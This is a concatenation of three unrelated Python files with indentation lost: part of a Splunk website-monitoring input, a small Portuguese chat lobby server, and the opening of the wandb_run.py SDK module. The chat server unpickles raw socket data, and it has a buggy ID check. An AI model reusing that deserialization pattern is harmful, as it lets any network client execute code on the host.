data['max_redirects'] = result.max_redirects
# Output the response body as a separate event, if present
if result.response_body is not None:
# Make the event
event_dict = {'stanza': stanza,
'data' : result.response_body}
if index is not None:
event_dict['index'] = index
if sourcetype is not None:
event_dict['sourcetype'] = sourcetype + ":response"
if source is not None:
event_dict['source'] = source
if host is not None:
event_dict['host'] = host
event = self._create_event(self.document,
params=event_dict,
stanza=stanza,
unbroken=unbroken,
close=close)
out.write(self._print_event(self.document, event))
# Add warning_threshold and/or error_threshold if not None
if result.warning_threshold is not None:
data['warning_threshold'] = result.warning_threshold
if result.error_threshold is not None:
data['error_threshold'] = result.error_threshold
# Output event with fields
return self.output_event(data, stanza, index=index, host=host, source=source,
sourcetype=sourcetype, unbroken=unbroken, close=close, out=out)
def save_checkpoint(self, checkpoint_dir, stanza, last_run):
"""
Save the checkpoint state.
Arguments:
checkpoint_dir -- The directory where checkpoints ought to be saved
stanza -- The stanza of the input being used
last_run -- The time when the analysis was last performed
"""
self.save_checkpoint_data(checkpoint_dir, stanza, {'last_run' : last_run})
@forgive_splunkd_outages
def get_app_config(self, session_key, stanza="default"):
"""
Get the app configuration.
Arguments:
session_key -- The session key to use when connecting to the REST API
stanza -- The stanza to get the proxy information from (defaults to "default")
"""
# See if it is in the cache
try:
website_monitoring_config = self.app_configs[stanza]
if website_monitoring_config is not None:
return website_monitoring_config
except KeyError:
# entry was not found, continue
pass
# If the stanza is empty, then just use the default
if stanza is None or stanza.strip() == "":
stanza = "default"
# Start off with a default list of settings
website_monitoring_config = {
'proxy_type' : 'http',
'proxy_server' : '',
'proxy_port' : '',
'proxy_user': '',
'proxy_password' : '',
'thread_limit' : 200,
'proxy_ignore' : None,
'max_response_body_length' : 1000
}
# Get the proxy configuration
try:
server_response, server_content = splunk.rest.simpleRequest('/servicesNS/nobody/website_monitoring/admin/website_monitoring/' + stanza + '?output_mode=json', sessionKey=session_key)
if server_response['status'] != '200':
raise Exception("Could not get the website_monitoring configuration")
app_content = json.loads(server_content)
self.logger.debug("Loaded config is %r", app_content)
website_monitoring_config.update(app_content['entry'][0]['content'])
# Convert the thread limit to an integer
try:
website_monitoring_config['thread_limit'] = int(website_monitoring_config['thread_limit'])
except ValueError:
# Use a value of 25 on Splunk Cloud
if self.is_on_cloud(session_key):
self.logger.error("The value for the thread limit is invalid and will be ignored (will use a limit of 25), value=%s", website_monitoring_config['thread_limit'])
website_monitoring_config['thread_limit'] = 25
else:
self.logger.error("The value for the thread limit is invalid and will be ignored (will use a limit of 200), value=%s", website_monitoring_config['thread_limit'])
website_monitoring_config['thread_limit'] = 200
# Convert the max_response_body_length to an integer
try:
website_monitoring_config['max_response_body_length'] = int(website_monitoring_config['max_response_body_length'])
except ValueError:
self.logger.error("The value for the maximum response body length is invalid and will be ignored (will use a limit of 1000), value=%s", website_monitoring_config['max_response_body_length'])
website_monitoring_config['max_response_body_length'] = 1000
self.logger.debug("App config information loaded, stanza=%s", stanza)
except splunk.ResourceNotFound:
self.logger.info('Unable to find the app configuration for the specified configuration stanza=%s, error="not found"', stanza)
except splunk.SplunkdConnectionException:
self.logger.error('Unable to find the app configuration for the specified configuration stanza=%s error="splunkd connection error", see url=http://lukemurphey.net/projects/splunk-website-monitoring/wiki/Troubleshooting', stanza)
raise
# Add the entry to the cache
self.app_configs[stanza] = website_monitoring_config
return website_monitoring_config
@forgive_splunkd_outages
def get_proxy_config(self, session_key, stanza="default"):
"""
Get the proxy configuration
This returns the following in a list:
# proxy type
# proxy server
# proxy port
# proxy user
# proxy ignore list
Arguments:
session_key -- The session key to use when connecting to the REST API
stanza -- The stanza to get the proxy information from (defaults to "default")
"""
# Don't allow the use of a proxy server on Splunk Cloud since this could
# allow unencrypted communication. Cloud shouldn't need the use of a proxy anyways.
# Some do use the app to test proxies but they should use an on-prem forwarder
# instead.
if self.is_on_cloud(session_key):
return "http", None, None, None, None, None
# If the stanza is empty, then just use the default
if stanza is None or stanza.strip() == "":
stanza = "default"
# Get the proxy configuration
website_monitoring_config = self.get_app_config(session_key, stanza)
# Get the proxy password from secure storage (if it exists)
secure_password = get_secure_password(realm=WebPing.PROXY_PASSWORD_REALM,
username=WebPing.PROXY_PASSWORD_USERNAME,
session_key=session_key)
if secure_password is not None:
proxy_password = secure_password['content']['clear_password']
self.logger.debug("Loaded the proxy password from secure storage")
elif website_monitoring_config is not None:
proxy_password = website_monitoring_config['proxy_password']
else:
proxy_password = None
if website_monitoring_config is not None:
return website_monitoring_config['proxy_type'], website_monitoring_config['proxy_server'], \
website_monitoring_config['proxy_port'], website_monitoring_config['proxy_user'], \
proxy_password, website_monitoring_config['proxy_ignore']
else:
return 'http', '', '', '', proxy_password, None
def cleanup_threads(self, threads):
# Keep track of the number of removed threads so that we can make sure to emit a log
# message noting the number of threads
removed_threads = 0
# Clean up old threads
for thread_stanza in list(threads):
# If the thread isn't alive, prune it
if not threads[thread_stanza].isAlive():
removed_threads = removed_threads + 1
self.logger.debug("Removing inactive thread for stanza=%s, thread_count=%i", thread_stanza, len(threads))
del threads[thread_stanza]
# If we removed threads, note the updated count in the logs so that it can be tracked
if removed_threads > 0:
self.logger.info("Removed inactive threads, thread_count=%i, removed_thread_count=%i", len(threads), removed_threads)
return removed_threads
def run(self, stanza, cleaned_params, input_config):
# Make the parameters
interval = cleaned_params.get("interval", None)
title = cleaned_params.get("title", None)
url = cleaned_params.get("url", None)
client_certificate = cleaned_params.get("client_certificate", None)
client_certificate_key = cleaned_params.get("client_certificate_key", None)
username = cleaned_params.get("username", None)
password = cleaned_params.get("password", None)
timeout = cleaned_params.get("timeout", self.timeout)
sourcetype = cleaned_params.get("sourcetype", "web_ping")
host = cleaned_params.get("host", None)
index = cleaned_params.get("index", "default")
conf_stanza = cleaned_params.get("configuration", None)
user_agent = cleaned_params.get("user_agent", None)
should_contain_string = cleaned_params.get("should_contain_string", None)
max_redirects = cleaned_params.get("max_redirects", -1)
return_body = cleaned_params.get("return_body", False)
return_headers = cleaned_params.get("return_headers", False)
warning_threshold = cleaned_params.get("warning_threshold", None)
error_threshold = cleaned_params.get("error_threshold", None)
source = stanza
self.logger.debug("cleaned_params=%r", cleaned_params)
# Check for missing parameters
if interval is None:
self.logger.error("Required parameter '%s' is missing for stanza=%s", "interval", stanza)
return
if title is None:
self.logger.error("Required parameter '%s' is missing for stanza=%s", "title", stanza)
return
if url is None:
self.logger.error("Required parameter '%s' is missing for stanza=%s", "url", stanza)
return
# Load the thread_limit if necessary
# This should only be necessary once in the processes lifetime
if self.default_app_config is None:
# Get the default app config
self.default_app_config = self.get_app_config(input_config.session_key)
self.logger.debug("Default config is %r", self.default_app_config)
# Get the limit from the app config
try:
loaded_thread_limit = int(self.default_app_config['thread_limit'])
except ValueError:
loaded_thread_limit = None
# Ensure that the thread limit is valid
# If it is valid and we are not on cloud, then just load it
# Or: if it is valid even for cloud, then load it
if (loaded_thread_limit is not None and loaded_thread_limit > 0 and not self.is_on_cloud(input_config.session_key)) \
or (loaded_thread_limit is not None and loaded_thread_limit <= 25 and self.is_on_cloud(input_config.session_key)):
self.thread_limit = loaded_thread_limit
self.logger.debug("Thread limit successfully loaded, thread_limit=%r",
loaded_thread_limit)
# If it is valid but too high and we are on cloud, then just set it to 25
elif loaded_thread_limit is not None and loaded_thread_limit > 25 and self.is_on_cloud(input_config.session_key):
self.thread_limit = 25
self.logger.warn("Thread limit is too high for Splunk Cloud as it must be no greater than 25; it will be set to 25, thread_limit=%r",
loaded_thread_limit)
# Warn that the thread limit is invalid
else:
self.logger.warn("The thread limit is invalid and will be ignored, thread_limit=%r", loaded_thread_limit)
# Default to 25 if on cloud
if self.is_on_cloud(input_config.session_key):
self.thread_limit = 25
# Clean up old threads
self.cleanup_threads(self.threads)
# Stop if we have a running thread
if stanza in self.threads:
self.logger.debug("No need to execute this stanza since a thread already running for stanza=%s", stanza)
# Determines if the input needs another run
elif self.needs_another_run(input_config.checkpoint_dir, stanza, interval):
# Get the secure password if necessary
if username is not None:
secure_password = get_secure_password(realm=stanza, session_key=input_config.session_key)
if secure_password is not None:
password = secure_password['content']['clear_password']
self.logger.debug("Successfully loaded the secure password for input=%s", stanza)
def run_ping():
# Get the proxy configuration
try:
proxy_type, proxy_server, proxy_port, proxy_user, proxy_password, proxy_ignore = \
self.get_proxy_config(input_config.session_key, conf_stanza)
except splunk.ResourceNotFound:
self.logger.error("The proxy configuration could not be loaded (was not found). The execution will be skipped for this input with stanza=%s", stanza)
return
except splunk.SplunkdConnectionException:
self.logger.error("The proxy configuration could not be loaded (Splunkd connection exception). The execution will be skipped for this input with stanza=%s, see url=http://lukemurphey.net/projects/splunk-website-monitoring/wiki/Troubleshooting", stanza)
return
except:
self.logger.exception("Exception generated when attempting to get the proxy configuration stanza=%s, see url=http://lukemurphey.net/projects/splunk-website-monitoring/wiki/Troubleshooting", stanza)
return
# Set the max response body length for this request
response_body_length = self.default_app_config['max_response_body_length']
if return_body is False:
response_body_length = 0
# Perform the ping
try:
result = WebPing.ping(url, username, password, timeout, proxy_type,
proxy_server, proxy_port, proxy_user, proxy_password,
proxy_ignore, client_certificate, client_certificate_key, user_agent, max_redirects,
logger=self.logger, should_contain_string=should_contain_string,
response_body_length=response_body_length, warning_threshold=warning_threshold,
error_threshold=error_threshold, return_headers=return_headers, fips_mode=ServerInfo.is_fips_mode(input_config.session_key))
except NTLMAuthenticationValueException as e:
self.logger.warn('NTLM authentication failed due to configuration issue stanza=%s, message="%s"', stanza, str(e))
with self.lock:
# Send the event
self.output_result(result, stanza, title, host=host, index=index, source=source,
sourcetype=sourcetype, unbroken=True, close=True,
proxy_server=proxy_server, proxy_port=proxy_port,
proxy_user=proxy_user, proxy_type=proxy_type)
# Get the time that the input last ran
last_ran = self.last_ran(input_config.checkpoint_dir, stanza)
# Save the checkpoint so that we remember when we last ran the input
self.save_checkpoint(input_config.checkpoint_dir, stanza,
self.get_non_deviated_last_run(last_ran, interval, stanza))
# Don't scan the URL if the URL is unencrypted and the host is on Cloud
if self.is_on_cloud(input_config.session_key) and not url.scheme == "https":
self.logger.warn("The URL will not be scanned because the host is running on Splunk Cloud and the URL isn't using encryption, url=%s", url.geturl())
# Don't scan the URL if the host is SHC and
elif self.is_on_cloud(input_config.session_key) and not url.scheme == "https":
self.logger.warn("The URL will not be scanned because the host is running on Splunk Cloud and the URL isn't using encryption, url=%s", url.geturl())
# If this is not running in multi-threading mode, then run it now in the main thread
elif self.thread_limit <= 1:
run_ping()
# If the number of threads is at or above the limit, then wait until the number of
# threads comes down
elif len(self.threads) >= self.thread_limit:
self.logger.warn("Thread limit has been reached and thus this execution will be skipped for stanza=%s, thread_count=%i", stanza, len(self.threads))
# Execute the input as a separate thread
else:
# Start a thread
t = threading.Thread(name='web_ping:' + stanza, target=run_ping)
self.threads[stanza] = t
t.start()
self.logger.info("Added thread to the queue for stanza=%s, thread_count=%i", stanza, len(self.threads))
if __name__ == '__main__':
web_ping = None
try:
web_ping = WebPing()
web_ping.execute()
sys.exit(0)
except Exception as e:
# This logs general exceptions that would have been unhandled otherwise (such as coding
# errors)
if web_ping is not None and web_ping.logger is not None:
web_ping.logger.exception("Unhandled exception was caught, this may be due to a defect in the script")
else:
raise e
|
server.py
|
import socket
import pickle
import threading as th
host = ''
port = 4041
ids_jogadores = []
conections = []
clientes = []
threads = []
mensagens = []
def existeIDinServer(id):
for j in ids_jogadores:
return j == id
return False
def broadCastMensagens(con):
q = {"erro": 0, "mensagens": mensagens}
con.send(pickle.dumps(q))
def lobbyClientServer(client, con):
try:
#conexão estabelecida
print('Cliente conectado', client)
dataJson = con.recv(1024)
dataJson = pickle.loads(dataJson)
if existeIDinServer(dataJson['id']):
r = {"erro": 1, "msg": "ID já existe na sala", "code": 1}
con.send(pickle.dumps(r))
exit()
print(f'{dataJson["id"]} entrou na sala.')
conections.append(con)
clientes.append(client)
ids_jogadores.append(dataJson['id'])
idClient = dataJson["id"]
r = {"erro": 0, "status": 1}
con.send(pickle.dumps(r))
while True:
try:
broadCastMensagens(con)
msg = con.recv(1024)
if msg:
dataJson = pickle.loads(msg)
# if existeIDinServer(dataJson['id']) and dataJson['state'] == 3:
# print('({0})> {1}'.format(idClient, dataJson["msg"]))
# mensagens.append([idClient, dataJson['msg']])
print('({0})> {1}'.format(idClient, dataJson["msg"]))
mensagens.append([idClient, dataJson['msg']])
except:
con.close()
print(f'{idClient} Cliente foi desconectado...')
ids_jogadores.remove(idClient)
clientes.remove(client)
conections.remove(con)
exit()
except:
print(f'Problema com o cliente {idClient}')
exit()
print('Servidor iniciado...')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
orig = (host, port)
s.bind(orig)
s.listen(1)
while True:
con, client = s.accept()
new_th = th.Thread(target=lobbyClientServer, args=(client, con, ))
new_th.start()
threads.append(new_th)
|
wandb_run.py
|
import _thread as thread
import atexit
from collections.abc import Mapping
from datetime import timedelta
from enum import IntEnum
import glob
import json
import logging
import numbers
import os
import re
import sys
import threading
import time
import traceback
from types import TracebackType
from typing import (
Any,
Callable,
Dict,
List,
NamedTuple,
Optional,
Sequence,
TextIO,
Tuple,
Type,
Union,
)
from typing import TYPE_CHECKING
import requests
import wandb
from wandb import errors
from wandb import trigger
from wandb._globals import _datatypes_set_callback
from wandb.apis import internal, public
from wandb.apis.internal import Api
from wandb.apis.public import Api as PublicApi
from wandb.proto.wandb_internal_pb2 import (
MetricRecord,
PollExitResponse,
RunRecord,
)
from wandb.util import (
_is_artifact_string,
add_import_hook,
parse_artifact_string,
sentry_set_scope,
to_forward_slash_path,
)
from wandb.viz import (
create_custom_chart,
custom_chart_panel_config,
CustomChart,
Visualize,
)
from . import wandb_artifacts
from . import wandb_config
from . import wandb_metric
from . import wandb_summary
from .interface.artifacts import Artifact as ArtifactInterface
from .interface.interface import InterfaceBase
from .interface.summary_record import SummaryRecord
from .lib import (
config_util,
deprecate,
filenames,
filesystem,
ipython,
module,
proto_util,
redirect,
telemetry,
)
from .lib.exit_hooks import ExitHooks
from .lib.git import GitRepo
from .lib.printer import get_printer
from .lib.reporting import Reporter
from .wandb_artifacts import Artifact
from .wandb_settings import Settings, SettingsConsole
from .wandb_setup import _WandbSetup
if TYPE_CHECKING:
from .data_types import WBValue
from .wandb_alerts import AlertLevel
from .interface.artifacts import (
ArtifactEntry,
ArtifactManifest,
)
from .lib.printer import PrinterTerm, PrinterJupyter
from wandb.proto.wandb_internal_pb2 import (
CheckVersionResponse,
GetSummaryResponse,
SampledHistoryResponse,
)
logger = logging.getLogger("wandb")
EXIT_TIMEOUT = 60
RE_LABEL = re.compile(r"[a-zA-Z0-9_-]+$")
class TeardownStage(IntEnum):
EARLY = 1
LATE = 2
class TeardownHook(NamedTuple):
call: Callable[[], None]
stage: TeardownStage
class RunStatusChecker(object):
"""Periodically polls the background process for relevant updates.
For now, we just use this to figure out if the user has requested a stop.
"""
def __init__(
self,
interface: InterfaceBase,
stop_polling_interval: int = 15,
retry_polling_interval: int = 5,
) -> None:
self._interface = interface
self._stop_polling_interval = stop_polling_interval
self._retry_polling_interval = retry_polling_interval
self._join_event = threading.Event()
self._stop_thread = threading.Thread(target=self.check_status)
self._stop_thread.name = "ChkStopThr"
self._stop_thread.daemon = True
self._stop_thread.start()
self._retry_thread = threading.Thread(target=self.check_network_status)
self._retry_thread.name = "NetStatThr"
self._retry_thread.daemon = True
self._retry_thread.start()
def check_network_status(self) -> None:
join_requested = False
while not join_requested:
status_response = self._interface.communicate_network_status()
if status_response and status_response.network_responses:
for hr in status_response.network_responses:
if (
hr.http_status_code == 200 or hr.http_status_code == 0
): # we use 0 for non-http errors (eg wandb errors)
wandb.termlog("{}".format(hr.http_response_text))
else:
wandb.termlog(
"{} encountered ({}), retrying request".format(
hr.http_status_code, hr.http_response_text.rstrip()
)
)
join_requested = self._join_event.wait(self._retry_polling_interval)
def check_status(self) -> None:
join_requested = False
while not join_requested:
status_response = self._interface.communicate_stop_status()
if status_response and status_response.run_should_stop:
# TODO(frz): This check is required
# until WB-3606 is resolved on server side.
if not wandb.agents.pyagent.is_running():
thread.interrupt_main()
return
join_requested = self._join_event.wait(self._stop_polling_interval)
def stop(self) -> None:
self._join_event.set()
def join(self) -> None:
self.stop()
self._stop_thread.join()
self._retry_thread.join()
class Run:
"""A unit of computation logged by wandb. Typically this is an ML experiment.
Create a run with `wandb.init()`:
<!--yeadoc-test:run-object-basic-->
```python
import wandb
run = wandb.init()
```
There is only ever at most one active `wandb.Run` in any process,
and it is accessible as `wandb.run`:
<!--yeadoc-test:global-run-object-->
```python
import wandb
assert wandb.run is None
wandb.init()
assert wandb.run is not None
```
anything you log with `wandb.log` will be sent to that run.
If you want to start more runs in the same script or notebook, you'll need to
finish the run that is in-flight. Runs can be finished with `wandb.finish` or
by using them in a `with` block:
<!--yeadoc-test:run-context-manager-->
```python
import wandb
wandb.init()
wandb.finish()
assert wandb.run is None
with wandb.init() as run:
pass # log data here
assert wandb.run is None
```
See the documentation for `wandb.init` for more on creating runs, or check out
[our guide to `wandb.init`](https://docs.wandb.ai/guides/track/launch).
In distributed training, you can either create a single run in the rank 0 process
and then log information only from that process or you can create a run in each process,
logging from each separately, and group the results together with the `group` argument
to `wandb.init`. For more details on distributed training with W&B, check out
[our guide](https://docs.wandb.ai/guides/track/advanced/distributed-training).
Currently there is a parallel `Run` object in the `wandb.Api`. Eventually these
two objects will be merged.
Attributes:
history: (History) Time series values, created with `wandb.log()`.
History can contain scalar values, rich media, or even custom plots
across multiple steps.
summary: (Summary) Single values set for each `wandb.log()` key. By
default, summary is set to the last value logged. You can manually
set summary to the best value, like max accuracy, instead of the
final value.
"""
_telemetry_obj: telemetry.TelemetryRecord
_telemetry_obj_active: bool
_telemetry_obj_dirty: bool
_telemetry_obj_flushed: bytes
_teardown_hooks: List[TeardownHook]
_tags: Optional[Tuple[Any, ...]]
_entity: Optional[str]
_project: Optional[str]
_group: Optional[str]
_job_type: Optional[str]
_name: Optional[str]
_notes: Optional[str]
_run_obj: Optional[RunRecord]
_run_obj_offline: Optional[RunRecord]
# Use string literal annotation because of type reference loop
_backend: Optional["wandb.sdk.backend.backend.Backend"]
_internal_run_interface: Optional[
Union[
"wandb.sdk.interface.interface_queue.InterfaceQueue",
"wandb.sdk.interface.interface_grpc.InterfaceGrpc",
]
]
_wl: Optional[_WandbSetup]
_out_redir: Optional[redirect.RedirectBase]
_err_redir: Optional[redirect.RedirectBase]
_redirect_cb: Optional[Callable[[str, str], None]]
_output_writer: Optional["filesystem.CRDedupedFile"]
_quiet: Optional[bool]
_atexit_cleanup_called: bool
_hooks: Optional[ExitHooks]
_exit_code: Optional[int]
_run_status_checker: Optional[RunStatusChecker]
_check_version: Optional["CheckVersionResponse"]
_sampled_history: Optional["SampledHistoryResponse"]
_final_summary: Optional["GetSummaryResponse"]
_poll_exit_response: Optional[PollExitResponse]
_use_redirect: bool
_stdout_slave_fd: Optional[int]
_stderr_slave_fd: Optional[int]
_artifact_slots: List[str]
_init_pid: int
_iface_pid: Optional[int]
_iface_port: Optional[int]
_attach_id: Optional[str]
_settings: Settings
def __init__(
self,
settings: Settings,
config: Optional[Dict[str, Any]] = None,
sweep_config: Optional[Dict[str, Any]] = None,
) -> None:
self._config = wandb_config.Config()
self._config._set_callback(self._config_callback)
self._config._set_artifact_callback(self._config_artifact_callback)
self._config._set_settings(settings)
self._backend = None
self._internal_run_interface = None
self.summary = wandb_summary.Summary(
self._summary_get_current_summary_callback,
)
self.summary._set_update_callback(self._summary_update_callback)
self.history_step = 0
self._torch_history: Optional["wandb.wandb_torch.TorchHistory"] = None
_datatypes_set_callback(self._datatypes_callback)
self._settings = settings
self._printer = get_printer(settings._jupyter)
self._wl = None
self._reporter: Optional[Reporter] = None
self._entity = None
self._project = None
self._group = None
self._job_type = None
self._run_id = settings.run_id
self._start_time = time.time()
self._starting_step = 0
self._name = None
self._notes = None
self._tags = None
self._remote_url = None
self._last_commit = None
self._hooks = None
self._teardown_hooks = []
self._redirect_cb = None
self._out_redir = None
self._err_redir = None
self.stdout_redirector = None
self.stderr_redirector = None
self._save_stdout = None
self._save_stderr = None
self._stdout_slave_fd = None
self._stderr_slave_fd = None
self._exit_code = None
self._exit_result = None
self._quiet = self._settings.quiet
self._output_writer = None
self._upgraded_version_message = None
self._deleted_version_message = None
self._yanked_version_message = None
self._used_artifact_slots: Dict[str, str] = {}
# Returned from backend request_run(), set from wandb_init?
self._run_obj = None
self._run_obj_offline = None
# Created when the run "starts".
self._run_status_checker = None
self._check_version = None
self._sampled_history = None
self._final_summary = None
self._poll_exit_response = None
# Initialize telemetry object
self._telemetry_obj = telemetry.TelemetryRecord()
self._telemetry_obj_active = False
self._telemetry_obj_flushed = b""
self._telemetry_obj_dirty = False
self._atexit_cleanup_called = False
self._use_redirect = True
# Pull info from settings
self._init_from_settings(settings)
# Initial scope setup for sentry. This might get changed when the
# actual run comes back.
sentry_set_scope(
settings_dict=self._settings, process_context="user",
)
# Populate config
config = config or dict()
wandb_key = "_wandb"
config.setdefault(wandb_key, dict())
self._launch_artifact_mapping: Dict[str, Any] = {}
self._unique_launch_artifact_sequence_names: Dict[str, Any] = {}
if settings.save_code and settings.program_relpath:
config[wandb_key]["code_path"] = to_forward_slash_path(
os.path.join("code", settings.program_relpath)
)
if sweep_config:
self._config.update_locked(
sweep_config, user="sweep", _allow_val_change=True
)
if (
self._settings.launch
and self._settings.launch_config_path
and os.path.exists(self._settings.launch_config_path)
):
self.save(self._settings.launch_config_path)
with open(self._settings.launch_config_path) as fp:
launch_config = json.loads(fp.read())
if launch_config.get("overrides", {}).get("artifacts") is not None:
for key, item in (
launch_config.get("overrides").get("artifacts").items()
):
self._launch_artifact_mapping[key] = item
artifact_sequence_tuple_or_slot = key.split(":")
if len(artifact_sequence_tuple_or_slot) == 2:
sequence_name = artifact_sequence_tuple_or_slot[0].split("/")[
-1
]
if self._unique_launch_artifact_sequence_names.get(
sequence_name
):
self._unique_launch_artifact_sequence_names.pop(
sequence_name
)
else:
self._unique_launch_artifact_sequence_names[
sequence_name
] = item
launch_run_config = launch_config.get("overrides", {}).get("run_config")
if launch_run_config:
self._config.update_locked(
launch_run_config, user="launch", _allow_val_change=True
)
self._config._update(config, ignore_locked=True)
# pid is set so we know if this run object was initialized by this process
self._init_pid = os.getpid()
# interface pid and port configured when backend is configured (See _hack_set_run)
# TODO: using pid isnt the best for windows as pid reuse can happen more often than unix
self._iface_pid = None
self._iface_port = None
self._attach_id = None
# for now, use runid as attach id, this could/should be versioned in the future
if self._settings._require_service:
self._attach_id = self._settings.run_id
def _set_iface_pid(self, iface_pid: int) -> None:
self._iface_pid = iface_pid
def _set_iface_port(self, iface_port: int) -> None:
self._iface_port = iface_port
def _telemetry_callback(self, telem_obj: telemetry.TelemetryRecord) -> None:
self._telemetry_obj.MergeFrom(telem_obj)
self._telemetry_obj_dirty = True
self._telemetry_flush()
def _telemetry_flush(self) -> None:
if not self._telemetry_obj_active:
return
if not self._telemetry_obj_dirty:
return
if self._backend and self._backend.interface:
serialized = self._telemetry_obj.SerializeToString()
if serialized == self._telemetry_obj_flushed:
return
self._backend.interface._publish_telemetry(self._telemetry_obj)
self._telemetry_obj_flushed = serialized
self._telemetry_obj_dirty = False
def _freeze(self) -> None:
self._frozen = True
def __setattr__(self, attr: str, value: object) -> None:
if getattr(self, "_frozen", None) and not hasattr(self, attr):
raise Exception("Attribute {} is not supported on Run object.".format(attr))
super(Run, self).__setattr__(attr, value)
def _telemetry_imports(self, imp: telemetry.TelemetryImports) -> None:
telem_map = dict(
pytorch_ignite="ignite", transformers_huggingface="transformers",
)
# calculate mod_map, a mapping from module_name to telem_name
mod_map = dict()
for desc in imp.DESCRIPTOR.fields:
if desc.type != desc.TYPE_BOOL:
continue
telem_name = desc.name
mod_name = telem_map.get(telem_name, telem_name)
mod_map[mod_name] = telem_name
# set telemetry field for every module loaded that we track
mods_set = set(sys.modules)
for mod in mods_set.intersection(mod_map):
setattr(imp, mod_map[mod], True)
def _update_settings(self, settings: Settings) -> None:
self._settings = settings
self._init_from_settings(settings)
def _init_from_settings(self, settings: Settings) -> None:
if settings.entity is not None:
self._entity = settings.entity
if settings.project is not None:
self._project = settings.project
if settings.run_group is not None:
self._group = settings.run_group
if settings.run_job_type is not None:
self._job_type = settings.run_job_type
if settings.run_name is not None:
self._name = settings.run_name
if settings.run_notes is not None:
self._notes = settings.run_notes
if settings.run_tags is not None:
self._tags = settings.run_tags
def _make_proto_run(self, run: RunRecord) -> None:
"""Populate protocol buffer RunData for interface/interface."""
if self._entity is not None:
run.entity = self._entity
if self._project is not None:
run.project = self._project
if self._group is not None:
run.run_group = self._group
if self._job_type is not None:
run.job_type = self._job_type
if self._run_id is not None:
run.run_id = self._run_id
if self._name is not None:
run.display_name = self._name
if self._notes is not None:
run.notes = self._notes
if self._tags is not None:
for tag in self._tags:
run.tags.append(tag)
if self._start_time is not None:
run.start_time.FromSeconds(int(self._start_time))
if self._remote_url is not None:
run.git.remote_url = self._remote_url
if self._last_commit is not None:
run.git.last_commit = self._last_commit
# Note: run.config is set in interface/interface:_make_run()
def _populate_git_info(self) -> None:
try:
repo = GitRepo(remote=self._settings.git_remote, lazy=False)
except Exception:
wandb.termwarn("Cannot find valid git repo associated with this directory.")
return
self._remote_url, self._last_commit = repo.remote_url, repo.last_commit
def __getstate__(self) -> Any:
"""Custom pickler."""
# We only pickle in service mode
if not self._settings or not self._settings._require_service:
return
_attach_id = self._attach_id
if not _attach_id:
return
return dict(_attach_id=_attach_id)
def __setstate__(self, state: Any) -> None:
"""Custom unpickler."""
if not state:
return
_attach_id = state.get("_attach_id")
if not _attach_id:
return
self._attach_id = _attach_id
@property
def _torch(self) -> "wandb.wandb_torch.TorchHistory":
if self._torch_history is None:
self._torch_history = wandb.wandb_torch.TorchHistory()
return self._torch_history
@property
def settings(self) -> Settings:
"""Returns a frozen copy of run's Settings object."""
cp = self._settings.copy()
cp.freeze()
return cp
@property
def dir(self) -> str:
"""Returns the directory where files associated with the run are saved."""
return self._settings.files_dir
@property
def config(self) -> wandb_config.Config:
"""Returns the config object associated with this run."""
return self._config
@property
def config_static(self) -> wandb_config.ConfigStatic:
return wandb_config.ConfigStatic(self._config)
@property
def name(self) -> Optional[str]:
"""Returns the display name of the run.
Display names are not guaranteed to be unique and may be descriptive.
By default, they are randomly generated.
"""
if self._name:
return self._name
if not self._run_obj:
return None
return self._run_obj.display_name
@name.setter
def name(self, name: str) -> None:
with telemetry.context(run=self) as tel:
tel.feature.set_run_name = True
self._name = name
if self._backend and self._backend.interface:
self._backend.interface.publish_run(self)
@property
def notes(self) -> Optional[str]:
"""Returns the notes associated with the run, if there are any.
Notes can be a multiline string and can also use markdown and latex equations
inside `$$`, like `$x + 3$`.
"""
if self._notes:
return self._notes
if not self._run_obj:
return None
return self._run_obj.notes
@notes.setter
def notes(self, notes: str) -> None:
self._notes = notes
if self._backend and self._backend.interface:
self._backend.interface.publish_run(self)
@property
def tags(self) -> Optional[Tuple]:
"""Returns the tags associated with the run, if there are any."""
if self._tags:
return self._tags
run_obj = self._run_obj or self._run_obj_offline
if run_obj:
return tuple(run_obj.tags)
return None
@tags.setter
def tags(self, tags: Sequence) -> None:
with telemetry.context(run=self) as tel:
tel.feature.set_run_tags = True
self._tags = tuple(tags)
if self._backend and self._backend.interface:
self._backend.interface.publish_run(self)
@property
def id(self) -> str:
"""Returns the identifier for this run."""
if TYPE_CHECKING:
assert self._run_id is not None
return self._run_id
@property
def sweep_id(self) -> Optional[str]:
"""Returns the ID of the sweep associated with the run, if there is one."""
if not self._run_obj:
return None
return self._run_obj.sweep_id or None
@property
def path(self) -> str:
"""Returns the path to the run.
Run paths include entity, project, and run ID, in the format
`entity/project/run_id`.
"""
parts = []
for e in [self._entity, self._project, self._run_id]:
if e is not None:
parts.append(e)
return "/".join(parts)
@property
def start_time(self) -> float:
"""Returns the unix time stamp, in seconds, when the run started."""
if not self._run_obj:
return self._start_time
else:
return self._run_obj.start_time.ToSeconds()
@property
def starting_step(self) -> int:
"""Returns the first step of the run."""
if not self._run_obj:
return self._starting_step
else:
return self._run_obj.starting_step
@property
def resumed(self) -> bool:
"""Returns True if the run was resumed, False otherwise."""
if self._run_obj:
return self._run_obj.resumed
return False
@property
def step(self) -> int:
"""Returns the current value of the step.
This counter is incremented by `wandb.log`.
"""
return self.history_step
def project_name(self) -> str:
run_obj = self._run_obj or self._run_obj_offline
return run_obj.project if run_obj else ""
@property
def mode(self) -> str:
"""For compatibility with `0.9.x` and earlier, deprecate eventually."""
deprecate.deprecate(
field_name=deprecate.Deprecated.run__mode,
warning_message=(
"The mode property of wandb.run is deprecated "
"and will be removed in a future release."
),
)
return "dryrun" if self._settings._offline else "run"
@property
def offline(self) -> bool:
return self._settings._offline
@property
def disabled(self) -> bool:
return self._settings._noop
@property
def group(self) -> str:
"""Returns the name of the group associated with the run.
Setting a group helps the W&B UI organize runs in a sensible way.
If you are doing a distributed training you should give all of the
runs in the training the same group.
If you are doing crossvalidation you should give all the crossvalidation
folds the same group.
"""
run_obj = self._run_obj or self._run_obj_offline
return run_obj.run_group if run_obj else ""
@property
def job_type(self) -> str:
run_obj = self._run_obj or self._run_obj_offline
return run_obj.job_type if run_obj else ""
@property
def project(self) -> str:
"""Returns the name of the W&B project associated with the run."""
return self.project_name()
def log_code(
self,
root: str = ".",
name: str = None,
include_fn: Callable[[str], bool] = lambda path: path.endswith(".py"),
exclude_fn: Callable[[str], bool] = filenames.exclude_wandb_fn,
) -> Optional[Artifact]:
"""Saves the current state of your code to a W&B Artifact.
By default it walks the current directory and logs all files that end with `.py`.
Arguments:
root: The relative (to `os.getcwd()`) or absolute path to recursively find code from.
